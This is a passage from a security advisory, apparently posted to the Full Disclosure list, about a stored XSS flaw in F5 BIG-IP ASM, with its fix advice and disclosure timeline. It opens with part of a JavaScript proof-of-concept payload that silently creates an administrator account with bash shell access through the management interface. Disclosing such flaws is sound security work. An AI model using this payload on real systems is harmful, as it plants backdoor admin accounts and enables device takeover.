      "&passwd_confirm=testing123&passwd_confirm_before=&passwd_confirm_validation=NO_VALIDATION&passwd_confirm_required=1" +
      "&user_role=0&user_role_before=900&shell_with_bash=bash&shell_with_bash_before=disable" +
      "&exit_button_before=Cancel&repeat_before=Repeat&finished=Finished&finished_before=Finished";
    postrequest.open("POST", "/tmui/Control/form", true);
    postrequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
    postrequest.send(parameters);
  }
};
xmlhttp.open("GET", "/tmui/Control/jspmap/tmui/system/user/create.jsp", true);
xmlhttp.responseType = "document";
xmlhttp.send();
</script>

Solution
========
Upgrade to 11.6. The vendor indicated the patch would not be backported to previous versions.

Timeline
========
06/09/14 - Reported issue to vendor
06/18/14 - Vendor confirms the vulnerability
07/18/14 - Vendor confirms the fix will be included in 11.6 and an SOL would be created for the vulnerability
10/24/14 - Vendor confirms the fix was included in 11.6.0 but an SOL was not created and the fix would not be backported.
01/12/14 - Released vulnerability info.
[FD] [Corrected] Stored XSS Vulnerability in F5 BIG-IP Application Security Manager
Edit: Corrected the date in the timeline from 01/12/14 to 01/12/15.

Timeline
========
06/09/14 - Reported issue to vendor
06/18/14 - Vendor confirms the vulnerability
07/18/14 - Vendor confirms the fix will be included in 11.6 and an SOL would be created for the vulnerability
10/24/14 - Vendor confirms the fix was included in 11.6.0 but an SOL was not created and the fix would not be backported.
01/12/15 - Released vulnerability info.